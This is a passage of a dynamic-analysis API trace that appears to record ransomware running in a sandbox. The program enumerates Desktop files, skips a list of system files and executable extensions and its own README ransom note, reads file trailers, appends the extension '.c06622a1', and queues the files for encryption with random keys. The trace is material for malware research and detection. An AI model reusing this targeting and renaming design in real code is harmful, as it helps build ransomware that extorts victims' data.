returned 3 [0148.231] wcslen (_String="icns") returned 0x4 [0148.231] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0148.231] wcslen (_String="ico") returned 0x3 [0148.231] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0148.231] wcslen (_String="ics") returned 0x3 [0148.231] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0148.231] wcslen (_String="idx") returned 0x3 [0148.231] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0148.231] wcslen (_String="ldf") returned 0x3 [0148.231] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0148.231] wcslen (_String="lnk") returned 0x3 [0148.231] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0148.231] wcslen (_String="mod") returned 0x3 [0148.231] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0148.231] wcslen (_String="mpa") returned 0x3 [0148.231] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0148.231] wcslen (_String="msc") returned 0x3 [0148.231] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0148.231] wcslen (_String="msp") returned 0x3 [0148.231] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0148.231] wcslen (_String="msstyles") returned 0x8 [0148.231] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0148.231] wcslen (_String="msu") returned 0x3 [0148.231] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0148.231] wcslen (_String="nls") returned 0x3 [0148.231] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0148.231] wcslen (_String="nomedia") returned 0x7 [0148.231] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0148.231] wcslen (_String="ocx") returned 0x3 [0148.232] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0148.232] wcslen (_String="prf") returned 0x3 [0148.232] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0148.232] wcslen (_String="ps1") returned 0x3 [0148.232] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0148.232] wcslen (_String="rom") returned 0x3 [0148.232] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0148.232] wcslen (_String="rtp") returned 0x3 [0148.232] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0148.232] wcslen (_String="scr") returned 0x3 [0148.232] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0148.232] wcslen (_String="shs") returned 0x3 [0148.232] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0148.232] wcslen (_String="spl") returned 0x3 [0148.232] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0148.232] wcslen (_String="sys") returned 0x3 [0148.232] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0148.232] wcslen (_String="theme") returned 0x5 [0148.232] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0148.232] wcslen (_String="themepack") returned 0x9 [0148.232] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0148.232] wcslen (_String="wpx") returned 0x3 [0148.232] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0148.232] wcslen (_String="lock") returned 0x4 [0148.232] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0148.232] wcslen (_String="key") returned 0x3 [0148.232] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0148.232] wcslen (_String="hta") returned 0x3 [0148.232] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0148.232] wcslen (_String="msi") returned 0x3 [0148.232] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0148.232] wcslen (_String="pdb") returned 0x3 [0148.232] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0148.232] wcslen (_String="sql") returned 0x3 [0148.232] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0148.232] wcslen (_String="sqlite") returned 0x6 [0148.232] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 0x10 [0148.233] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.233] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" [0148.233] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned 0x45 [0148.233] wcscpy (in: _Dest=0x4530134, _Source="cmaaKq91yJ82Pxf.flv" | out: _Dest="cmaaKq91yJ82Pxf.flv") returned="cmaaKq91yJ82Pxf.flv" [0148.233] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv", dwFileAttributes=0x80) returned 1 [0148.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\cmaakq91yj82pxf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0148.233] SetFilePointerEx (in: hFile=0x660, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.233] ReadFile (in: hFile=0x660, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.234] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xc7c5ab1f [0148.234] RtlComputeCrc32 (PartialCrc=0xab1f, Buffer=0x3fe674, Length=0x80) returned 0x8724d61c [0148.234] RtlComputeCrc32 (PartialCrc=0xd61c, Buffer=0x3fe674, Length=0x80) returned 0xc569f96 [0148.234] RtlComputeCrc32 (PartialCrc=0x9f96, Buffer=0x3fe674, Length=0x80) returned 0xd8587e5d [0148.234] RtlComputeCrc32 (PartialCrc=0x7e5d, Buffer=0x3fe674, Length=0x80) returned 0x85e4ba3c [0148.234] CloseHandle (hObject=0x660) returned 1 [0148.234] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.234] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv" [0148.234] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv") returned 0x59 [0148.234] wcscpy (in: _Dest=0x4540162, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.234] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\cmaakq91yj82pxf.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\cmaakq91yj82pxf.flv.c06622a1"), dwFlags=0x8) returned 1 [0148.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\cmaaKq91yJ82Pxf.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\cmaakq91yj82pxf.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x660 [0148.237] CreateIoCompletionPort (FileHandle=0x660, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.237] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x13ed1fd0 [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x49f15e2e [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xda769b1 [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4710a98c [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3115b758 [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x45974682 [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a099080 [0148.242] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64233e24 [0148.245] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xe387281 [0148.245] RtlComputeCrc32 (PartialCrc=0x7281, Buffer=0x4670094, Length=0x80) returned 0x40e04456 [0148.245] RtlComputeCrc32 (PartialCrc=0x4456, Buffer=0x4670094, Length=0x80) returned 0x696c4730 [0148.245] RtlComputeCrc32 (PartialCrc=0x4730, Buffer=0x4670094, Length=0x80) returned 0xc8b93949 [0148.245] RtlComputeCrc32 (PartialCrc=0x3949, Buffer=0x4670094, Length=0x80) returned 0xf3b08e76 [0148.245] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.245] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.245] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.245] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb318b0, ftCreationTime.dwHighDateTime=0x1d5ded8, ftLastAccessTime.dwLowDateTime=0x70094030, ftLastAccessTime.dwHighDateTime=0x1d5d852, ftLastWriteTime.dwLowDateTime=0x70094030, ftLastWriteTime.dwHighDateTime=0x1d5d852, nFileSizeHigh=0x0, nFileSizeLow=0x5e1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="dU5zQ9J3ch2Om5Aj2yz.pdf", cAlternateFileName="DU5ZQ9~1.PDF")) returned 1 [0148.245] _wcsicmp (_Str1="dU5zQ9J3ch2Om5Aj2yz.pdf", _Str2="README.c06622a1.TXT") returned -14 [0148.245] wcsstr (_Str="dU5zQ9J3ch2Om5Aj2yz.pdf", _SubStr="README") returned 0x0 [0148.246] _wcsicmp (_Str1="autorun.inf", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned -3 [0148.246] wcslen (_String="autorun.inf") returned 0xb [0148.246] _wcsicmp (_Str1="boot.ini", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned -2 [0148.246] wcslen (_String="boot.ini") returned 0x8 [0148.246] _wcsicmp (_Str1="bootfont.bin", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned -2 [0148.246] wcslen (_String="bootfont.bin") returned 0xc [0148.246] _wcsicmp (_Str1="bootsect.bak", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned -2 [0148.246] wcslen (_String="bootsect.bak") returned 0xc [0148.246] _wcsicmp (_Str1="desktop.ini", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned -16 [0148.246] wcslen (_String="desktop.ini") returned 0xb [0148.246] _wcsicmp (_Str1="iconcache.db", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned 5 [0148.246] wcslen (_String="iconcache.db") returned 0xc [0148.246] _wcsicmp (_Str1="ntldr", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned 10 [0148.246] wcslen (_String="ntldr") returned 0x5 [0148.246] _wcsicmp (_Str1="ntuser.dat", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned 10 [0148.246] wcslen (_String="ntuser.dat") returned 0xa [0148.246] _wcsicmp (_Str1="ntuser.dat.log", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned 10 [0148.246] wcslen (_String="ntuser.dat.log") returned 0xe [0148.246] _wcsicmp (_Str1="ntuser.ini", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned 10 [0148.246] wcslen (_String="ntuser.ini") returned 0xa [0148.246] _wcsicmp (_Str1="thumbs.db", _Str2="dU5zQ9J3ch2Om5Aj2yz.pdf") returned 16 [0148.246] wcslen (_String="thumbs.db") returned 0x9 [0148.247] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0148.247] wcslen (_String="386") returned 0x3 [0148.247] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0148.247] wcslen (_String="adv") returned 0x3 [0148.247] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0148.247] wcslen (_String="ani") returned 0x3 [0148.247] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0148.247] wcslen (_String="bat") returned 0x3 [0148.247] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0148.247] wcslen (_String="bin") returned 0x3 [0148.247] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0148.247] wcslen (_String="cab") returned 0x3 [0148.247] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0148.247] wcslen (_String="cmd") returned 0x3 [0148.247] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0148.247] wcslen (_String="com") returned 0x3 [0148.247] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0148.247] wcslen (_String="cpl") returned 0x3 [0148.247] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0148.247] wcslen (_String="cur") returned 0x3 [0148.247] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0148.247] wcslen (_String="deskthemepack") returned 0xd [0148.247] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0148.247] wcslen (_String="diagcab") returned 0x7 [0148.247] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0148.247] wcslen (_String="diagcfg") returned 0x7 [0148.247] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0148.247] wcslen (_String="diagpkg") returned 0x7 [0148.247] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0148.247] wcslen (_String="dll") returned 0x3 [0148.247] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0148.247] wcslen (_String="drv") returned 0x3 [0148.247] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0148.247] wcslen (_String="exe") returned 0x3 [0148.247] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0148.247] wcslen (_String="hlp") returned 0x3 [0148.247] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0148.247] wcslen (_String="icl") returned 0x3 [0148.247] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0148.248] wcslen (_String="icns") returned 0x4 [0148.248] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0148.248] wcslen (_String="ico") returned 0x3 [0148.248] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0148.248] wcslen (_String="ics") returned 0x3 [0148.248] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0148.248] wcslen (_String="idx") returned 0x3 [0148.248] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0148.248] wcslen (_String="ldf") returned 0x3 [0148.248] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0148.248] wcslen (_String="lnk") returned 0x3 [0148.248] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0148.248] wcslen (_String="mod") returned 0x3 [0148.248] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0148.248] wcslen (_String="mpa") returned 0x3 [0148.248] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0148.248] wcslen (_String="msc") returned 0x3 [0148.248] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0148.248] wcslen (_String="msp") returned 0x3 [0148.248] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0148.248] wcslen (_String="msstyles") returned 0x8 [0148.248] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0148.248] wcslen (_String="msu") returned 0x3 [0148.248] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0148.248] wcslen (_String="nls") returned 0x3 [0148.248] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0148.248] wcslen (_String="nomedia") returned 0x7 [0148.248] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0148.248] wcslen (_String="ocx") returned 0x3 [0148.248] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0148.248] wcslen (_String="prf") returned 0x3 [0148.248] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0148.248] wcslen (_String="ps1") returned 0x3 [0148.248] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0148.248] wcslen (_String="rom") returned 0x3 [0148.248] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0148.248] wcslen (_String="rtp") returned 0x3 [0148.248] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0148.249] wcslen (_String="scr") returned 0x3 [0148.249] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0148.249] wcslen (_String="shs") returned 0x3 [0148.249] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0148.249] wcslen (_String="spl") returned 0x3 [0148.249] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0148.249] wcslen (_String="sys") returned 0x3 [0148.249] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0148.249] wcslen (_String="theme") returned 0x5 [0148.249] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0148.249] wcslen (_String="themepack") returned 0x9 [0148.249] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0148.249] wcslen (_String="wpx") returned 0x3 [0148.249] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0148.249] wcslen (_String="lock") returned 0x4 [0148.249] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0148.249] wcslen (_String="key") returned 0x3 [0148.249] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0148.249] wcslen (_String="hta") returned 0x3 [0148.249] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0148.249] wcslen (_String="msi") returned 0x3 [0148.249] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0148.249] wcslen (_String="pdb") returned 0x3 [0148.249] _wcsicmp (_Str1="sql", _Str2="pdf") returned 3 [0148.249] wcslen (_String="sql") returned 0x3 [0148.249] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0148.249] wcslen (_String="sqlite") returned 0x6 [0148.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 0x10 [0148.249] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.249] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" [0148.249] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned 0x45 [0148.249] wcscpy (in: _Dest=0x4530134, _Source="dU5zQ9J3ch2Om5Aj2yz.pdf" | out: _Dest="dU5zQ9J3ch2Om5Aj2yz.pdf") returned="dU5zQ9J3ch2Om5Aj2yz.pdf" [0148.249] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf", dwFileAttributes=0x80) returned 1 [0148.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\du5zq9j3ch2om5aj2yz.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0148.250] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.250] ReadFile (in: hFile=0x618, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.251] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x86817c7c [0148.251] RtlComputeCrc32 (PartialCrc=0x7c7c, Buffer=0x3fe674, Length=0x80) returned 0x2e89a1c3 [0148.251] RtlComputeCrc32 (PartialCrc=0xa1c3, Buffer=0x3fe674, Length=0x80) returned 0xa63a6302 [0148.251] RtlComputeCrc32 (PartialCrc=0x6302, Buffer=0x3fe674, Length=0x80) returned 0x4bf58574 [0148.251] RtlComputeCrc32 (PartialCrc=0x8574, Buffer=0x3fe674, Length=0x80) returned 0xa3a3ec95 [0148.251] CloseHandle (hObject=0x618) returned 1 [0148.251] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.251] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf" [0148.251] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf") returned 0x5d [0148.251] wcscpy (in: _Dest=0x454016a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.251] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\du5zq9j3ch2om5aj2yz.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\du5zq9j3ch2om5aj2yz.pdf.c06622a1"), dwFlags=0x8) returned 1 [0148.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\dU5zQ9J3ch2Om5Aj2yz.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\du5zq9j3ch2om5aj2yz.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0148.254] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.254] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6555d782 [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5738ff63 [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2990f0cb [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3c1f085 [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d62d09b [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54de349b [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ca6bc2 [0148.259] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x35c9da8a [0148.262] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0xe8dacb14 [0148.262] RtlComputeCrc32 (PartialCrc=0xcb14, Buffer=0x4700094, Length=0x80) returned 0xda4e5e03 [0148.262] RtlComputeCrc32 (PartialCrc=0x5e03, Buffer=0x4700094, Length=0x80) returned 0x33476041 [0148.262] RtlComputeCrc32 (PartialCrc=0x6041, Buffer=0x4700094, Length=0x80) returned 0xf061cb9d [0148.262] RtlComputeCrc32 (PartialCrc=0xcb9d, Buffer=0x4700094, Length=0x80) returned 0xe9e447b [0148.262] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0148.262] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.262] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.262] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffcc8d0, ftCreationTime.dwHighDateTime=0x1d5d957, ftLastAccessTime.dwLowDateTime=0xf7dd7e80, ftLastAccessTime.dwHighDateTime=0x1d5e398, ftLastWriteTime.dwLowDateTime=0xf7dd7e80, ftLastWriteTime.dwHighDateTime=0x1d5e398, nFileSizeHigh=0x0, nFileSizeLow=0xd376, dwReserved0=0x0, dwReserved1=0x0, cFileName="lwV 0hsOIy.bmp", cAlternateFileName="LWV0HS~1.BMP")) returned 1 [0148.262] _wcsicmp (_Str1="lwV 0hsOIy.bmp", _Str2="README.c06622a1.TXT") returned -6 [0148.262] wcsstr (_Str="lwV 0hsOIy.bmp", _SubStr="README") returned 0x0 [0148.262] _wcsicmp (_Str1="autorun.inf", _Str2="lwV 0hsOIy.bmp") returned -11 